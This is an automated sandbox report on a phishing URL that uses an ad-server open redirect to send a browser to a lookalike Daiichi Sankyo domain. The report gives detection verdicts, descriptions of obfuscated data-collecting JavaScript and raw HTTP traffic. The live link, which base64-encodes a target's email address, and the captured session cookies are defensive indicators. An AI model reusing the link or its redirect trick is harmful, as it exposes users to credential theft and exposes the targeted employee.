Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==

Overview

General Information

Sample URL:http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==
Analysis ID:1585184
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 6016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2220,i,6973843325363131521,10193747245632863849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/Avira URL Cloud: Label: malware
Source: https://daiichi-sankyo.uronfecit.ru/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxl... This script exhibits several high-risk behaviors, including disabling common developer tools and keyboard shortcuts, as well as redirecting the user to a suspicious domain (login.microsoftonline.com) after a delay. The script appears to be attempting to prevent analysis and hide its true purpose, which is likely malicious.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxl... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. Overall, the script demonstrates highly suspicious and potentially malicious behavior.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxl... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: ib.adnxs.com to https://daiichi-sankyo.uronfecit.ru/hlnz62kk/
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /sbounce?%2Fgetuid%3Fhttps%253a%252f%252fDaiichi-sankyo.uronfecit.ru%2FHlnz62kK%2F HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsbounce%3F%252Fgetuid%253Fhttps%25253a%25252f%25252fDaiichi-sankyo.uronfecit.ru%252FHlnz62kK%252F HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=9yHpGXri8Ioe_BUtNnupIXBf8F_T6hcftGFJpgm94DCGwN_F4lPnR5O6_n9GBFbtDUA95kc1kfVHpnNwpUes3Mnim-bnKmOUOFe3QE0JGhw.; receive-cookie-deprecation=1; uuid2=6436725576506890040
Source: global trafficHTTP traffic detected: GET /Hlnz62kK/ HTTP/1.1Host: daiichi-sankyo.uronfecit.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://daiichi-sankyo.uronfecit.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://daiichi-sankyo.uronfecit.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://daiichi-sankyo.uronfecit.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://daiichi-sankyo.uronfecit.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://daiichi-sankyo.uronfecit.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2815f5f9a43d9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2815f5f9a43d9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: daiichi-sankyo.uronfecit.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImV4S3YvNFBDL29ibHRaUHpjZjY4dVE9PSIsInZhbHVlIjoiOW4zaXdSc2MyQ2FaUGx4SHN6QVdXOU5qRE1CZzlITDY2NGRJdHVMSmMxNmJFNHViUDFYaldOSHdkRzNWQ2I0eVA2TE9TRXg3c2Q0Q0lyQzZaNlNyY0tjQVBuYXNKWkNFc20xcFZDRCtYd0NTMk9QcHFaUklYalRWaEZQSzErVmkiLCJtYWMiOiIwNWY5NjI4Mjg5Mjk1ZDQ2OGRkMTI1OWEzNzU0MzVjMTFmNzM4NmRlNmI0Y2M0NmE1ZWFkOWQ1ZDM1ZjdmNDNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im5EQ1k2MmFObUttUSt6TVNZMUJnV2c9PSIsInZhbHVlIjoielcvOVQ3MUJVVjVSNUxIQUNMdUpXbjNrNzFLNG02Q3RINm1IZlZRUExQUVJFN0E4YXZCNVdBZllyZDRWaHMvR2tmLzJIVXIrSVVWTStnbjZXZXMyaTdLVHNZaTY0WTRRNWNpa08xTVMzcnZXK09jSG1HWW1kUDVlaGZZSkYvZEkiLCJtYWMiOiI1ZWJkMDA0YzhiYTJkNTU0NTQzZjQ5NWM0ZDViZWQ5MDJlYTdhMzNjNDc2YzQyYmMxNGU5MjgwMmMzYjk3ZjFhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe2815f5f9a43d9/1736237784602/358c44a4c49bb720c6effbedb10fe6a8c3f4bb3a9a27837586d7500655e91efe/zA-xGfAHtVaKXPL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/ HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: daiichi-sankyo.uronfecit.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3214sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AEsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:16:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HShHOmDE2cG2wPAdvpVo1Z2m6SGLFNB%2BhtkPKnuiYY4QBF2ZCkRSUDMaxN3NFYQxn4FZHdiMZK8OBo1us8fgfBdpVmt7vrdVfRuNdgZ01%2BbePtjkxpHJmd10mOxhUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1388&min_rtt=1371&rtt_var=400&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2253&delivery_rate=2014144&cwnd=251&unsent_bytes=0&cid=d8aa1b082f1d8600&ts=19&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8fe28168fb1c8cb7-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1937&rtt_var=750&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1920&delivery_rate=1437007&cwnd=168&unsent_bytes=0&cid=ce9fb820d8bca080&ts=347&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:16:25 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: GyHbvmaYlV9ikZC/a3SG7dX6xartvyKKygY=$5vCi/lSzLCBUypiXcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe281702b0d43b1-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:16:29 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: mbQiZ4PoFzdrsirPmycHli7+IztmFkP/Wcg=$DqBOGEKkPqqNLmoYcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe2818589d78c5f-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
